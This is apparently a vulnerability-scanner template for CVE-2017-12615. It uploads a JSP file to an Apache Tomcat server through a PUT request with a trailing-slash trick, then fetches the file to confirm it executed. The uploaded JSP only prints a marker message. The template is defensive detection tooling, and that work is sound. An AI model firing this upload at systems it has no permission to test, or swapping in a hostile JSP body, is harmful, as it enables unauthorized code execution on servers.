id: CVE-2017-12615
single: true
info:
  name: Tomcat PUT method allowed
  risk: High

variables:
  - ran: RandomString(6)

requests:
  - method: PUT
    redirect: false
    url: >-
      {{.BaseURL}}/{{.ran}}.jsp/
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    body: |
      <% out.write("<html><body><h3>JSP uploaded</h3></body></html>"); %>
  # verify request
  - method: GET
    redirect: false
    url: >-
      {{.BaseURL}}/{{.ran}}.jsp
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch('response', 'JSP uploaded')

reference:
  - https://www.cvebase.com/cve/2017/12615